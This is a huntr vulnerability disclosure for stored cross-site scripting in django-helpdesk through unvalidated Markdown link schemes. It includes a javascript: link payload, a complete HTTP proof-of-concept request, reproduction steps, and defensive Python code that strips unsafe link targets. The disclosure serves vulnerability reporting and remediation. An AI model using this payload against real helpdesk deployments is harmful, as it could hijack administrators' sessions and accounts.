huntr - noobpk - BE7F211D-4BFD-44FD-91E8-682329906FBD
History: Nov 19, 2021 - 2:14 a.m.

Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

2021-11-19 02:14:59
noobpk
www.huntr.dev

0.002 Low

EPSS

Percentile

56.6%

Description

Stored XSS via Markdown at Description or Comment of Ticket

Detail

When rendering Markdown, the application does not validate link targets (the URL scheme of the href attribute), so when a user enters [XSS](javascript:alert(`document.domain`)) it is rendered as an anchor whose href is that javascript: URL, i.e. <a href="javascript:alert(`document.domain`)">XSS</a>.
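The following is an added example, not django-helpdesk's own code, showing the check the paragraph above says is missing: once the Markdown engine has produced HTML, re-parse it and drop every <a href> whose URL scheme is not on an allowlist, keeping the link text. The Markdown engine itself, the ALLOWED_SCHEMES policy and the sample HTML are assumptions for illustration; only the standard-library html.parser and urllib.parse calls are real APIs.

```python
# Added example (not django-helpdesk's own code): post-render link sanitizer.
# Assumes the Markdown engine has already turned the ticket body into HTML;
# this pass only enforces an href scheme allowlist. Standard library only.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy: only these schemes may appear in a rendered link target.
# Relative URLs (no scheme) are kept; javascript:, data:, vbscript: are not listed.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def href_is_safe(url: str) -> bool:
    """True if the link target is relative or uses an allowlisted scheme."""
    # Browsers ignore tabs, newlines and leading whitespace inside a scheme,
    # so strip ASCII control characters and spaces before parsing.
    cleaned = "".join(ch for ch in url if ord(ch) > 32)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


class LinkSchemeSanitizer(HTMLParser):
    """Re-emits the HTML it is fed, dropping <a href> values that fail href_is_safe."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = 0  # number of hrefs removed; worth logging for detection

    def _render_tag(self, tag, attrs, self_closing=False):
        parts = [tag]
        for name, value in attrs:
            if tag == "a" and name == "href" and not href_is_safe(value or ""):
                self.dropped += 1
                continue  # keep the anchor text, lose the dangerous target
            if value is None:
                parts.append(name)
            else:
                parts.append(f'{name}="{escape(value, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        self.out.append(self._render_tag(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        self.out.append(self._render_tag(tag, attrs, self_closing=True))

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # convert_charrefs=True hands us decoded text, so re-escape it on output.
        self.out.append(escape(data, quote=False))


def sanitize_links(rendered_html: str):
    """Return (sanitized_html, number_of_hrefs_dropped)."""
    parser = LinkSchemeSanitizer()
    parser.feed(rendered_html)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed sample: what a Markdown engine emits for the advisory's payload.
    rendered = '<p><a href="javascript:alert(`document.domain`)">XSS</a></p>'
    print(sanitize_links(rendered))  # ('<p><a>XSS</a></p>', 1)
```

Running the sanitizer on the rendered ticket body before it reaches the template turns the payload into a plain <a>XSS</a> with no target, so clicking it does nothing; the dropped-href counter is a cheap signal to log, since a ticket submitted with a javascript: link is itself worth a closer look.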

Proof of Concept

// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
Origin: http://127.0.0.1:8080
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="csrfmiddlewaretoken"

o6SgjwQ9VozjIi2mYHAi5ImkD7UbKviMnTTO69SA4K9oxVP6JJlKOD5KfQpu0N1E
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="queue"

1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="title"

XSS Markdown
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="body"

[XSS](javascript:alert(`document.domain`))
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="priority"

3
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="due_date"


-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream


-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="submitter_email"

[email protected]
-----------------------------69350364819088505273728279714--

Step to Reproduce

Ticket

Go to the ticket submission URL without logging in: https://[DOMAIN]/tickets/submit/

At the field [Description of your issue], input the payload: [XSS](javascript:alert(`document.domain`))

Comment Ticket

At the field [Comment / Resolution], input the payload: [XSS](javascript:alert(`document.domain`))

The XSS triggers when the admin clicks the rendered link in the description or the comment.

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
